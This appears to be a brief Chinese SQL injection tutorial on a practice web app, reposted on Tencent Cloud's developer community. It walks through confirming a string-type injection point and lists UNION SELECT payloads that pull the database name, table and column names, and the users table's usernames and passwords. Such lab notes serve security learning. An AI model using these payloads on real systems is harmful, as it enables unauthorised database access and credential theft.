SELECT first_name, last_name FROM users WHERE user_id = $id
SELECT first_name, last_name FROM users WHERE user_id = '$id'
一般可以通过直接输入单引号来判断是否存在注入点
通过输入3和1+2判断注入为字符型注入,若为数字型注入,则3和1+2输出一样
字符型注入最关键的是如何闭合SQL语句以及注释多余的代码
SELECT first_name, last_name FROM users WHERE user_id = '$id'
# 为注释
False or True
判断数据库字段数为2
1' union select 1,2 #
1' union select user(),database() #
1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#
1' union select 1, group_concat(column_name) from information_schema.columns where table_name='users'#
1' union select user,password from users#
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。